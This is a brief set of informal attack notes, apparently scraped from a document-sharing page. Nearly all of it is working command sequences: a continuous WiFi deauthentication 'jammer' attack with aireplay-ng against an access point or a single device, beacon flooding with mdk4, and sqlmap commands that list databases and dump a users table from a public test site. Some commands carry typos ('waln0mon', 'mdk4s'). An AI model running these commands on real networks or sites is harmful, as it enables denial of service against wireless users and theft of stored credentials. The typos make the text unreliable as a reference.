You are on page 1of 1

Wifi Jammer Attack:

#airmon-ng start wlan0


#airodump-ng wlan0mon
#airodump-ng -c 8 --bssid BC:8A:E8:16:66:C2 waln0mon
now we do denial attack
#aireplay-ng -0 0 -a bssid wlan0mon
OR for particular one device
#aireplay-ng -0 0 -a bssid -c [target station] wlan0mon
here i give 0 not 10 or 100 because it continuous de-authentication

Beacon flooding (many random access point show)


mdk4 wlan0mon b -a -w nta -m
if u want to that many rondom access point show with particular names
then create leafpad test.list and type some name
mdk4s wlan0mon b -f test.list

#sqlmap -u ‘http://testphp.vulnweb.com/artists.php?artist=1’ --batch


#sqlmap -u ‘http://testphp.vulnweb.com/artists.php?artist=1’ --batch --dbs
#sqlmap -u ‘http://testphp.vulnweb.com/artists.php?artist=1’ --batch -D acuart –
tables
#sqlmap -u ‘http://testphp.vulnweb.com/artists.php?artist=1’ --batch -D acuart -T
users --dump

You might also like